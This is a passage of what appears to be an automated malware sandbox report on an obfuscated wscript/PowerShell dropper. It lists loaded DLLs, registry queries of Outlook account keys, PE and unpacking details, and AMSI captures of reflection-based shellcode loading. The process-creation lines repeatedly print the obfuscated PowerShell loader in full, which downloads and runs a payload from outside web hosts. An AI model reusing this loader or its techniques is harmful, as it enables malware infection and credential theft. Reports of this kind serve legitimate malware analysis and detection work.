                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeFile opened: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.cfgJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: m.Core.pdb source: powershell.exe, 00000007.00000002.4567700425.0000000006D69000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Automation.pdb source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Core.pdb source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.4570530076.0000000008800000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbS(b source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: em.pdb source: powershell.exe, 00000007.00000002.4567700425.0000000006D69000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: tem.Core.pdbd source: powershell.exe, 0000000B.00000002.4570530076.0000000008800000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Core.pdbk source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: stem.Core.pdbP source: powershell.exe, 0000000B.00000002.4570530076.0000000008800000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeUnpacked PE file: 4.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeUnpacked PE file: 5.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeUnpacked PE file: 6.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                      Source: Yara matchFile source: 0000000B.00000002.4571603039.000000000A795000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Whiffer)$global:Hebenon = [System.Text.Encoding]::ASCII.GetString($Forlis)$global:Desquamations=$Hebenon.substring($Hjsangs,$Destalinising)<#Afslutt Adoptivdtrenes nedrulningen Salin
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Discommend175 $Fugitating120 $Kortspillene), (Wraithy @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Institutionaliser = [AppDomain]::CurrentDomain.GetAss
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Leveringstidspunktet)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($blankoveksel, $false).DefineType($Ly
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Whiffer)$global:Hebenon = [System.Text.Encoding]::ASCII.GetString($Forlis)$global:Desquamations=$Hebenon.substring($Hjsangs,$Destalinising)<#Afslutt Adoptivdtrenes nedrulningen Salin
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF 